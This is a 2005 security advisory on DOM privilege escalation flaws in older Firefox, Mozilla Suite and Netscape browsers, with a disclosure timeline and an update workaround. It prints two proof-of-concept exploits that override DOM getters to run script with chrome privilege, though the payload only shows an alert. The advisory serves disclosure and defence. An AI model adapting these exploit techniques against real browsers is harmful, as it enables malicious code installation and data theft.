|
Brought to you by:
Suppliers of:
|
|
|
| |
| Multiple Privilege Escalation in DOM where found in Mozilla based we browsers (Mozilla suite, Netscape and Firefox) that give attackers the ability to install malicious code or steal data, requiring only that the user do commonplace actions like click on a link or open the context menu. |
| |
Credit:
The information has been provided by Juha-Matti Laurio .
The original article can be found at: http://www.networksecurity.fi/advisories/netscape-dom.txt
For more information about the bug please visit the following site: http://www.mozilla.org/security/announce/mfsa2005-41.html
|
| |
Vulnerable Systems:
* Firefox version 1.0.2 and prior
* Mozilla Suite version 1.7.6 and prior
* Netscape version 7.2
Immune Systems:
* Firefox version 1.0.3
* Mozilla Suite version 1.7.7
By using eval() and other Javascript functions, it is possible to override properties and methods of DOM nodes and shadow the native values, unless steps are taken to get the true underlying values. The common cause in each case was privileged UI code ("chrome") being overly trusting of DOM nodes from the content window. Scripts in the web page can override properties and methods of DOM nodes and shadow the native values, unless steps are taken to get the true underlying values.
Exploit 1:
< body style="width:100%;height:100%;">
Click on document.
< script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'body';";
document.body.__defineGetter__("localName", function() {
var s = new String('BODY');
s.toLowerCase = new Script(code);
return s;
});
</script>
</body>
Exploit 2:
< script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'';";
document.createElement("link").__proto__
.__defineGetter__("rel", new Script(code));
</script>
<link rel="test"/>
< pre>
Target of attack
Firefox 1.0.2
livemarkOnLinkAdded() in browser.js
< i>var erel = event.target.rel;</i>
If pref "browser.chrome.site_icons" is true:
Firefox 1.0.2
onLinkAdded() in tabbrowser.xml
< i>if (!event.target.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
return;</i>
Mozilla 1.7.6
onLinkAdded() in tabbrowser.xml
< i>if (!event.originalTarget.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
return;</i>
</pre>
Workaround:
Update to the latest Firefox/Mozilla suite web browser or disable Javascript support.
CVE Information:
Disclosure Timeline:
23-04-2005 - Vulnerability discovered
28-04-2005 - Detailed research
28-04-2005 - Vendor informed
28-04-2005 - Security companies informed
29-04-2005 - More security companies and CERT-FI informed
29-04-2005 - Advisory published
|
|
|
|
|
